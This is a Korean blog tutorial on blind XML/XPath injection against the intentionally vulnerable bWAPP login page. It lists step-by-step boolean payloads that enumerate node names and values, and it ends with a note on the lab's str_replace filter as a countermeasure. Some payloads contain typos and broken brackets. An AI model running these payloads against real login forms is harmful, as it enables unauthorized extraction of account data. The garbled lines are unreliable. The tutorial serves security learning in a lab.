[Bee-box] XML/Xpath 인젝션-2

이번 포스팅은 XML/Xpath blind injection입니다.

 

lucete1230-cyberpolice.tistory.com/100?category=851757

앞 xml/xpath공격과 이어지는 injection입니다.

 

실습하는 모든 공격은 실제로 사용하시면 안됩니다.

허용받지 않은 서비스 대상에 해킹을 시도하는 행동은 금지하며,

모든 법적 책임은 사용자에게 있는 것을 명심해주세요.

 

 

** 이번글은 이론위주의 블라인드 sql injection입니다. XML을 처음 접하는 분들께서는 노드와, 하위 노드의 개념들을 좀 익히신 후 실습해보는 것을 권장합니다.**

 

---

 

전 글에 이어서,  이 페이지는 XML 데이터 베이스에 저장되어 있으므로

superhero 그룹 사용자의 계정 정보는 노드 구조로 이루어져 있다.

 

따라서 Xpath를 사용하여 데이터베이스 구조를 파악한다.

 

xmli_1.php 페이지는 로그인 페이지 이므로, 로그인 성공일 때와 실패일 때의 응답만 제공한다.

쿼리 입력에 참과 거짓 결과를 통해 데이터 베이스를 추측하는 boolean based sql injection을 시도한다.

 

 

우선 데이터 베이스 구조를 파악하기 위해 노드의 개수를 파악하는 count함수를 사용한다.

count 함수의 인자로는 부모 노드의 모든 자식 노드를 조회하는 Xpath를 입력한다.

즉 현재 노드를 포함하여 부모 노드의 -> 자식 노드가 총 몇 개인지 파악한다.

 

 

쿼리는 :

neo' and count(../child::*)=6 or 'a'='b 일때 로그인에 성공한다.

즉 자식노드는 총 6개이다. 

count함수는 노드의 개수를 숫자로 반환해주는 함수이다.

 

쿼리의 마지막b는 a가 되어도 상관없고 1,0 등 참과 거짓에 여부가 상관없다.

이유는 앞에 쿼리가 참일 시 = 어짜피 참 일 것이고, 거짓이라고 하면 둘다 거짓이므로, 거짓의 값을 반환 할것이므로

참 / 거짓 여부를 판별하는데에 문제 없다.

 

실제 쿼리는 login='neo' and count(../child::*)=6 or 'a'='b' 가 될 것이다.

 

다음으로는 부모 노드 명을 확인하기 위한 쿼리를 입력해보자.

 

'name' 은 인자에 입력된 노드명을 출력하는 함수이고, 'string-length'는 인자로 받는 문자열의 길이를 

반환하는 함수이다.

 

부모노드명 알아보기:

 

neo' and string-length(name(parent::*))=6 or 'a'='b

 

해석하자면 부모노드의 이름의 길이는 = 6 ! 이라고 보면된다.

1~6까지 입력해본 결과 길이는 6이다.

 

하나하나 쿼리를 다 작성한다면 글이매우 길어질 것 같아서 요약해서 정리하자면,

 

부모노드 이름 추측하기 :

 

neo' and substring(name(parent::*),1,1) = 'h' or 'a'='b

neo' and substring(name(parent::*),2,1) = 'e' or 'a'='b

neo' and substring(name(parent::*),3,1) = 'r' or 'a'='b

...

 

부모노드 이름 : heroes 

 

부모노드의 자식 노드명의 길이를 추측하는 쿼리 : 

(자식노드가 몇개일 지 모르므로, limit로 제한을 둔다. mysql의 limit같은 연산자가 xml에서는 position 함수이다.)

 

neo' and string-length(name(../chile::*[position()=1]))=4 or 'a'='b

 

자식 노드명 추측 : 

neo' and substring(name(../child::*[position()=1),1,1)='h' or 'h'='b

neo' and substring(name(../child::*[position()=1),2,1)='h' or 'e'='b

neo' and substring(name(../child::*[position()=1),3,1)='h' or 'r'='b

neo' and substring(name(../child::*[position()=1),4,1)='h' or 'o'='b

 

자식 노드명 = hero

 

자식노드의 개수는 총 6개이다. (position 을 바꿔가며 알 수 있음)

노드명은 6개 모두 동일하다.

 

 

Xml 데이터베이스 이므로, 사용자 정의로 같은 속성을 지닌 노드는 노드명이 동일하다.

따라서 현재까지 데이터베이스 구조는 다음과 같다.

쿼리를 하나하나 다 해보면 너무 길기 때문에, 파이썬 코드를 짜서 blind sql 공격을 시도하는것을 권장함. 

 

 

 

---

 

다른 방법으로 현재 노드를 통하여 노드명을 알아낼 수 있다.

 

마치 mysql 에서 비교하자면 database() 함수로 자신의 db명을 알 수 있는 것과 같다.

 

neo' and string-length(name(.))=4 or 'a'='b

여기서 name(.) 은 현재 노드의 이름을 의미한다. 즉 현재 노드의 이름의 길이는 4라고 추측 가능

 

현재 노드명을 찾기 위해서는 다음과 같은 쿼리가 쓰인다.

 

neo' and substring(name(.)),1,1)='h' or 'a'='b

이런식으로 하다보면 현재 노드  이름을 알 수 있다.

 

---

 

## hero 밑단의 자식노드들 ##

 

1. 현재 노드의 자식노드를 알아보자 (현재 노드 경로: hero)

neo' and count(/heroes/hero[1]/child::*)=6 or 'a'='b

 

<1부터 써봤더니, 6에서 참이 뜬다.>

즉 heroes밑에 hero라는 노드 중 [1]는 첫번째 노드를 말한다. 

 

첫번째 hero 노드의 자식노드는 총 6개이다.

 

2. 첫번째 자식노드명의 길이를 알아보자.

neo' and string-length(name(//hero[1]/child::*[position()=1]))=1 or 'a'='b

neo' and string-length(name(//hero[1]/child::*[position()=1]))=2 or 'a'='b

 

--> 2일때 ok , 즉 첫번째 자식노드 길이 ==2

 

3. 첫번째 자식노드명 알아보기

neo' and substring(name(//hero[1]/child::*[position()=1]),1,1)='i' or 'a'='b

neo' and substring(name(//hero[1]/child::*[position()=1]),2,1)='d' or 'a'='b

 

자식노드명 == id

 

 

4. id의 자식노드의 길이

 

neo' and string-length(string(//hero[1]/id))= 1 or 'a'='b

 

id의 자식 노드 값의 길이가 몇인지 알아내기 위해 문자열을 반환하는 string과

문자열의 길이를 반환하는 string-length함수를 사용한다.

1부터 입력한 결과 바로 로그인 성공 --> id 라는 자식노드명과 노드에 입력된 문자열의 길이가 1 이라는 점에서,

순서번호를 뜻한다고 추측한다.

 

5. id의 자식노드의 값

neo' and substring(string(//hero[1]/id))= 1 or 'a'='b

순서번호의 값은 1!

 

계속 이어서 노드들의 정보를 알아내려면 position함수에 대입한 값을 증가시키면 된다. position이 다끝나면

hero[1] --> hero[2] --> ...등으로 인젝션을 이어나가면 된다.

 

XML blind sql injection CLEAR

 

 

---

 

대응 방안

난이도 상 에서는 작은 따옴표를 사용하여도 XML오류 메세지를 확인할 수 없다.

 

난이도 상 에 페이지 코드를 확인 하면, xmli_check_1 () 함수를 사용하여 데이터를 우회한다.

 

 

 

함수를 살펴보았더니(함수는 functions_external.php에 정의되어있음)

'str_replace' 함수를 호출한다. 이 함수는 치환함수라고 봐도 되는데,

 

인젝션에 사용되는 문자를 공백으로 대체하는 함수이다.

str_replace 함수는 첫번째 인자에, 대체하려는 문자(즉 인젝션에 사용되는 문자)를 입력하고

두번째 인자에는 대체할 문자를 입력한다. 

마지막 인자에는 변경할 내용을 저장할 변수를 입력한다.  xmli_check_1함수에서 대체하는 문자들은 위와같고

이 문자를 공백으로 변환하여 injection을 시도할 시 먹히지 않게끔 막는 것이다.